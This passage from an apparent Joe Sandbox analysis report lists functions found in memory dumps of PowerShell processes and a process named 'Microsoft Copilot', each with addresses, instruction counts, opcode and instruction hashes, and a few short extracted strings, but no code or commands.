                                                                                      • Opcode Fuzzy Hash: 6c86f600f741c21971d5ce77b03abcaec1416eae83c0757e2340acbd7b8a7fc3
                                                                                      • Instruction Fuzzy Hash: 70C148B290EA8A9FF7959F6898155B97BE0FF56310B0441BEE84DC70D3DA18E809C3D1
                                                                                      Function 00007FFAACC04034 Relevance: .4, Instructions: 383COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1643159267.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacc00000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 34e38235cbc72bf02ac54a4fac0e3ee3dd0637b832fc5d1134743d7fa82f62f9
                                                                                      • Instruction ID: e40b3f20f87791e62c32474cf16f989df336a36134544bcd5f42b402c1312f5e
                                                                                      • Opcode Fuzzy Hash: 34e38235cbc72bf02ac54a4fac0e3ee3dd0637b832fc5d1134743d7fa82f62f9
                                                                                      • Instruction Fuzzy Hash: 2FB1F762A0EB869FE396DB2858555657FE1DF97220B0941FBD08DC71A3DE18DC0AC3C1
                                                                                      Function 00007FFAACB3B248 Relevance: .4, Instructions: 367COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1642146125.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacb30000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d8df4d85ead4dc1d98a8a0da1aea7eb9e5ecf2e1a2912124284a2ccfccc24fea
                                                                                      • Instruction ID: a43a36f5452300291d2f8eeb4c421ef265bfbd44ed46cde4d00ddaf1332af348
                                                                                      • Opcode Fuzzy Hash: d8df4d85ead4dc1d98a8a0da1aea7eb9e5ecf2e1a2912124284a2ccfccc24fea
                                                                                      • Instruction Fuzzy Hash: 1BB1487061CB898FE749DF1CC885AB5BBE1EF96311F10417ED08EC3696DA25E846CB81
                                                                                      Function 00007FFAACC04370 Relevance: .1, Instructions: 147COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1643159267.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacc00000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 16bee2edb7a9060e5019be78fc5c499d684bcc335da79aa797d45765bf106032
                                                                                      • Instruction ID: 92adfc7bec70b42853cdff6cb21b92f643055a7175d96de6dc0a593911084566
                                                                                      • Opcode Fuzzy Hash: 16bee2edb7a9060e5019be78fc5c499d684bcc335da79aa797d45765bf106032
                                                                                      • Instruction Fuzzy Hash: 8F413672A0EA499FF7E5DB68A4159B57BD1EF82220B0804FED14DC7493EE14EC0883C1
                                                                                      Function 00007FFAACB39758 Relevance: .1, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1642146125.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacb30000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fb944fae3d2c799e85a77e704d66ffc6baf1ef6a1e5dcb1e474dad9735e97a0b
                                                                                      • Instruction ID: d163291018374c92a17fa1e611278f50c35e47a9ee5b96acb72eca08430e23ff
                                                                                      • Opcode Fuzzy Hash: fb944fae3d2c799e85a77e704d66ffc6baf1ef6a1e5dcb1e474dad9735e97a0b
                                                                                      • Instruction Fuzzy Hash: 5D310B7191CB488FDB1C9F5CE84A6A97BE1FBA5310F00412FE449C3692DB71A815CBC2
                                                                                      Function 00007FFAACA1EE20 Relevance: .1, Instructions: 125COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1641069543.00007FFAACA1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA1D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaaca1d000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a7e2f812bf450b69d4bf6aaee9e651f8badf4a04ab324c444df3d5cbac52b9f1
                                                                                      • Instruction ID: 8130c5c7afc345f995467b02e306c123f3a8befeb5e535505f60d6cd35eddce9
                                                                                      • Opcode Fuzzy Hash: a7e2f812bf450b69d4bf6aaee9e651f8badf4a04ab324c444df3d5cbac52b9f1
                                                                                      • Instruction Fuzzy Hash: 1241283040EBC49FE756CB29A8459623FF1EF57320B1545EFD088CB1A3D625E84AC792
                                                                                      Function 00007FFAACB39FF3 Relevance: .1, Instructions: 120COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1642146125.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacb30000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b2d2c3f3a643c8b397b6b8f6ebfa13a8a9edfc518eaca3a58dd8548f6f216a88
                                                                                      • Instruction ID: 44dc53fb7b3930cf50e7c0cf5f02de6d8d2e4980c8d792e3dbd683f1b30d1dc1
                                                                                      • Opcode Fuzzy Hash: b2d2c3f3a643c8b397b6b8f6ebfa13a8a9edfc518eaca3a58dd8548f6f216a88
                                                                                      • Instruction Fuzzy Hash: FC413866D1D58ACEDB025F5DE8580E77BA0FF1771AF0403B2C4699A093FB294858C3DA
                                                                                      Function 00007FFAACC040BF Relevance: .1, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1643159267.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacc00000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8cbfcf4ee70c692b205beac28290fcb0fb8b0facac498b1f250956b247f26de1
                                                                                      • Instruction ID: 4e1625a1fa8dc5aaf949b54d7c699ffcd29063879fad480b827f90518e9d431b
                                                                                      • Opcode Fuzzy Hash: 8cbfcf4ee70c692b205beac28290fcb0fb8b0facac498b1f250956b247f26de1
                                                                                      • Instruction Fuzzy Hash: 1821267290FA87AFF7E5DF1C855557666D2EF52210B5980BAC14EC71E3CE28EC098381
                                                                                      Function 00007FFAACC043BC Relevance: .1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1643159267.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacc00000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 66bb725437f2014f525daa58aeda3ec69e93c3cdb0210d62c0ef6bce5c5fc7a6
                                                                                      • Instruction ID: ccd0ce82dffa9cbc81d11d08af04c5446f9848a00ada3d3d43129436ee3ed973
                                                                                      • Opcode Fuzzy Hash: 66bb725437f2014f525daa58aeda3ec69e93c3cdb0210d62c0ef6bce5c5fc7a6
                                                                                      • Instruction Fuzzy Hash: 0811323290E6899FF6E4EB6890559B97BD1EF02220B0854FAD14DC7493DE18EC088380
                                                                                      Function 00007FFAACB333B5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1642146125.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacb30000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                      • Instruction ID: 02d18d0c24301f623419d874371f47b8c87410a6690afa191d8220a6acbbcbba
                                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                      • Instruction Fuzzy Hash: A601677111CB0C8FD744EF0CE451AA6B7E0FB99364F10056DE58AC3691DB36E882CB45

                                                                                      Executed Functions

                                                                                      Function 00007FFAACB2644D Relevance: .7, Instructions: 691COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1860034143.00007FFAACB25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB25000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacb25000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d601b0e0bca03e3be11ff88b29fd35038c3582c70fa4c1d81b632d54910a1e8a
                                                                                      • Instruction ID: f67d2754a4086d9b6cfe77e4b1acb0e7a8955147a1904fa6697609f762d7cf06
                                                                                      • Opcode Fuzzy Hash: d601b0e0bca03e3be11ff88b29fd35038c3582c70fa4c1d81b632d54910a1e8a
                                                                                      • Instruction Fuzzy Hash: 9ED19D30A18A5DCFEB85DF58C445AA9BBE1FF69300F14816AD40DD7296DB35E885CBC0
                                                                                      Function 00007FFAACBF660A Relevance: .5, Instructions: 463COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1861249284.00007FFAACBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacbf0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 464e5bd0b2727c98576b993e4435d35583dfc915a64f840bc371f410d0cbfeb5
                                                                                      • Instruction ID: e8d487bb6b30cc6faa1755df68a9b5c718630038196bc781b1230567e069ef5f
                                                                                      • Opcode Fuzzy Hash: 464e5bd0b2727c98576b993e4435d35583dfc915a64f840bc371f410d0cbfeb5
                                                                                      • Instruction Fuzzy Hash: 1CD174A290EB9A9FF7559B6888155B97BE0EF16310B0841BFD84DC72D3DA19EC09C3C1
                                                                                      Function 00007FFAACBF4073 Relevance: .2, Instructions: 183COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1861249284.00007FFAACBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacbf0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c2f2d16112ba9d7f9ef4aa97a0a62fff86fc7e95906920e81786fcd7a36c23ab
                                                                                      • Instruction ID: 7f0d27188b376d0d644c09876f788c2f803f9bf173501150399c1fa54ad2c272
                                                                                      • Opcode Fuzzy Hash: c2f2d16112ba9d7f9ef4aa97a0a62fff86fc7e95906920e81786fcd7a36c23ab
                                                                                      • Instruction Fuzzy Hash: C6513862A0DB968FF799D72CD4116B47BD2EF96210B1880BAC14DC7393DE26EC0987C1
                                                                                      Function 00007FFAACBF4370 Relevance: .1, Instructions: 147COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1861249284.00007FFAACBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacbf0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 812bb5805d0ddd81a4467beb6260af8e80124c08ff1c62fda10d0d62db499937
                                                                                      • Instruction ID: 0d7b31b872850d3f95d044e5d0c44b2207c599ec88e13a812361874f82287551
                                                                                      • Opcode Fuzzy Hash: 812bb5805d0ddd81a4467beb6260af8e80124c08ff1c62fda10d0d62db499937
                                                                                      • Instruction Fuzzy Hash: AB412662A0DB598FF795D72894159B57BD1EF42220B0884BAD18DC7293EE15EC1887C1
                                                                                      Function 00007FFAACB29790 Relevance: .1, Instructions: 124COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1860034143.00007FFAACB25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB25000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacb25000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1ff8140a54260d0bf57d95b363b6e6e96bfb11c7413d6757d86743cf8596c79e
                                                                                      • Instruction ID: d848b7b4fb6d9905004d4c50f5bc53971d26cc0722124e6b1c58b1a18bdef037
                                                                                      • Opcode Fuzzy Hash: 1ff8140a54260d0bf57d95b363b6e6e96bfb11c7413d6757d86743cf8596c79e
                                                                                      • Instruction Fuzzy Hash: A331C87191CB488FEB189B5CE8466A97BE0FB59311F00826FE44DD3252DB71A855CBC2
                                                                                      Function 00007FFAACA0E540 Relevance: .1, Instructions: 122COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1854488473.00007FFAACA0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA0D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaaca0d000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dce87310edfe3d598fd2dd526abe7301ae03ff50a63223f10d910f6413a95e05
                                                                                      • Instruction ID: 685cd1749f6729b3663ecec6c8847f183d0af991f355cc834ae39927508013c2
                                                                                      • Opcode Fuzzy Hash: dce87310edfe3d598fd2dd526abe7301ae03ff50a63223f10d910f6413a95e05
                                                                                      • Instruction Fuzzy Hash: 2341283141EBC45FE7968B28A8419623FF0EF57320B1546DFD08CCB1A3E625E84AC792
                                                                                      Function 00007FFAACB2A64C Relevance: .1, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1860034143.00007FFAACB25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB25000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacb25000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 03a80e878156c9d83365ff56a30c3df53daf9213c5dc13b9032e835e4cd12b29
                                                                                      • Instruction ID: 36ac74012fc187f145aa54f2e43e34f5dafb1687c64f7cfc35a620117789e23e
                                                                                      • Opcode Fuzzy Hash: 03a80e878156c9d83365ff56a30c3df53daf9213c5dc13b9032e835e4cd12b29
                                                                                      • Instruction Fuzzy Hash: 8C21283090CB4C8FEB59DBACD84A7E97FE0EB96321F04416BD44CC3152DA759449CB92
                                                                                      Function 00007FFAACBF40BF Relevance: .1, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1861249284.00007FFAACBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacbf0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f7ca40330b995d96b054442f9a215af3456394f44ef8918295f768047f235317
                                                                                      • Instruction ID: cb33b1c26319100e127c0852f350386f9df3f71b5c9d41bf7373e225d51afbc3
                                                                                      • Opcode Fuzzy Hash: f7ca40330b995d96b054442f9a215af3456394f44ef8918295f768047f235317
                                                                                      • Instruction Fuzzy Hash: AD21366290EB978FF395DB2CC4555B46AC2EF52210B49C0BAC14DC73A2CE2ADC088BC0
                                                                                      Function 00007FFAACBF43BC Relevance: .1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1861249284.00007FFAACBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacbf0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 43b0b5c55b1beaaf0d8fe3bccdc957f10a835b40d82b2e510fcf89cdc1aa5a16
                                                                                      • Instruction ID: 66880f6c02e9ff3ce45cf4d190ed0a8381739157843cf4818df29a8d8e303d8a
                                                                                      • Opcode Fuzzy Hash: 43b0b5c55b1beaaf0d8fe3bccdc957f10a835b40d82b2e510fcf89cdc1aa5a16
                                                                                      • Instruction Fuzzy Hash: 3811363290E7998FF6A5D728D0549F47BD0EF0222070880F6D05DC7293DE1AEC088BC1
                                                                                      Function 00007FFAACB233B5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1860034143.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacb20000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction ID: 11d66e6850bd6f8ec4bcad91ddbe9ab688b9d117742591c10d6e6c16f703269a
                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction Fuzzy Hash: 9401677111CB0C8FD744EF0CE451AA6B7E0FB99364F10056DE58AC36A1DB36E882CB45

                                                                                      Non-executed Functions

                                                                                      Function 00007FFAACB28BFA Relevance: 6.3, Strings: 5, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1860034143.00007FFAACB25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB25000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacb25000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: N_^5$N_^8$N_^F$N_^I$N_^K
                                                                                      • API String ID: 0-759930175
                                                                                      • Opcode ID: 23239d7b90cefc8b6c7613284b9219181e9ecf42c16bfb57a40dff7a504e192c
                                                                                      • Instruction ID: e054c49baf7f1426b7b016c4ccb94fb8c9b8173f4d3e12d18928218311c3c3eb
                                                                                      • Opcode Fuzzy Hash: 23239d7b90cefc8b6c7613284b9219181e9ecf42c16bfb57a40dff7a504e192c
                                                                                      • Instruction Fuzzy Hash: AD2125F7B151214B930137BEEC659D8B784DF9537534942B2D298CF523EE14608A8AC6

                                                                                      Executed Functions

                                                                                      Function 00007FFAACB516E9 Relevance: .7, Instructions: 697COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 261d10dc314be433c33dd678d593e6a9102ea5502c0c64aaaee1e1ce011707e3
                                                                                      • Instruction ID: cf050de85ed77840e4313a5e0c47744f94ce30eaec0ffd29570f0d804f959bc1
                                                                                      • Opcode Fuzzy Hash: 261d10dc314be433c33dd678d593e6a9102ea5502c0c64aaaee1e1ce011707e3
                                                                                      • Instruction Fuzzy Hash: 9B22B770B18A598FE798F738C499679B6E2FF99304F44457DE40FC32E6DE29A8018781
                                                                                      Function 00007FFAACB50E5E Relevance: .3, Instructions: 280COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eba621ade819e9977f2345d042d476687e1698054709013cd84f5c20486640f3
                                                                                      • Instruction ID: 5fcc6cd37f37f7f96b6bb69995a0562704cc5a086d0b5aa6bc074acb96a25f10
                                                                                      • Opcode Fuzzy Hash: eba621ade819e9977f2345d042d476687e1698054709013cd84f5c20486640f3
                                                                                      • Instruction Fuzzy Hash: 1B7128A2A0D6960FE352B3BCE4595F96B95DF87324B0840BBD4CDCA0B3EE085847C395
                                                                                      Function 00007FFAACB520C1 Relevance: .2, Instructions: 204COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 13b32a30086c97cde48eaedc3a02b751cd09095712027a9283d8234f1bb7c32e
                                                                                      • Instruction ID: 9120127bb7fdf3a0730fab0b4d1d3d0a1c5e67abef4b9c52c8dc9126f8f74fe3
                                                                                      • Opcode Fuzzy Hash: 13b32a30086c97cde48eaedc3a02b751cd09095712027a9283d8234f1bb7c32e
                                                                                      • Instruction Fuzzy Hash: A3512351A5E6C94FE786A77888246767FE9DF87219B0804FEE0CEC3193DD18584AC382
                                                                                      Function 00007FFAACB507F2 Relevance: 2.6, Strings: 2, Instructions: 146COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ;L_$<L_^
                                                                                      • API String ID: 0-636787459
                                                                                      • Opcode ID: e9bfe4fb85025c56bc8c759d666d7d11313c5490cafb1a4bf871f3cb37a35ea7
                                                                                      • Instruction ID: b28ab22c11f039c4b391e9870bfe2b9a32cde0cbf5a30181727efe06c2353e0c
                                                                                      • Opcode Fuzzy Hash: e9bfe4fb85025c56bc8c759d666d7d11313c5490cafb1a4bf871f3cb37a35ea7
                                                                                      • Instruction Fuzzy Hash: C94109B1A092198FD344FBACE4958E97BB2EF85314744447AD84C872ABEF386445C794
                                                                                      Function 00007FFAACB511F2 Relevance: 1.8, Strings: 1, Instructions: 573COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 2L_^
                                                                                      • API String ID: 0-3004606202
                                                                                      • Opcode ID: c2d1be68cfbd4e2f6c0f12087d4d516f84e2030e589d9e21963d7dde4dd0c500
                                                                                      • Instruction ID: 47bc24c3f44075041866c7201d25b4f793b6f2994b83044db91c3db170eb537c
                                                                                      • Opcode Fuzzy Hash: c2d1be68cfbd4e2f6c0f12087d4d516f84e2030e589d9e21963d7dde4dd0c500
                                                                                      • Instruction Fuzzy Hash: 3D51E8A2D0A65A8FE741B7BCE8964F9BBB0EF43324B08417AD08DD60B3DE15540AC3D5
                                                                                      Function 00007FFAACB511F0 Relevance: 1.8, Strings: 1, Instructions: 570COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 2L_^
                                                                                      • API String ID: 0-3004606202
                                                                                      • Opcode ID: 06b0dad697b9b6ae92e3f06391f1670aefa56338146405c7461a4768ebce3a21
                                                                                      • Instruction ID: 2394323ba131d4634f966a720b0015a313b00b7991a166166d1ceb2082e7f7d2
                                                                                      • Opcode Fuzzy Hash: 06b0dad697b9b6ae92e3f06391f1670aefa56338146405c7461a4768ebce3a21
                                                                                      • Instruction Fuzzy Hash: DB51D5A2D0A65A8FE741B7BCE8964F97B70DF43324B08417AD08DD61B3EE15540983D5
                                                                                      Function 00007FFAACB512B8 Relevance: .5, Instructions: 485COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 51f0e292c135985b638b80d20bbbf7bae60b09cd45a4ee4290802c0041f2b753
                                                                                      • Instruction ID: 1abac5ac26e92679ef1e47de2b5cd9d6df0fcf9244be7d0d8f70205bac29ca28
                                                                                      • Opcode Fuzzy Hash: 51f0e292c135985b638b80d20bbbf7bae60b09cd45a4ee4290802c0041f2b753
                                                                                      • Instruction Fuzzy Hash: 5431F361909A5ECFE785E7A8D8664FCBBB1FF56200F4441BAD00EE31E7DE25580AC391
                                                                                      Function 00007FFAACB50AFB Relevance: .2, Instructions: 205COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e2ab2f7e3ddd75be99a1adf6140e2c8803dff9a600d4eed76ce76b1c32a8ed1a
                                                                                      • Instruction ID: d0f915c69d515d6881a929c31056fe46542321c3b0a9f18399c3d9d267796113
                                                                                      • Opcode Fuzzy Hash: e2ab2f7e3ddd75be99a1adf6140e2c8803dff9a600d4eed76ce76b1c32a8ed1a
                                                                                      • Instruction Fuzzy Hash: A451F3B2E0952A8BEB45BBBCE4955FC73A1EF85325B40413AD00DC32A7DF39A446C6D4
                                                                                      Function 00007FFAACB50B6F Relevance: .2, Instructions: 157COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
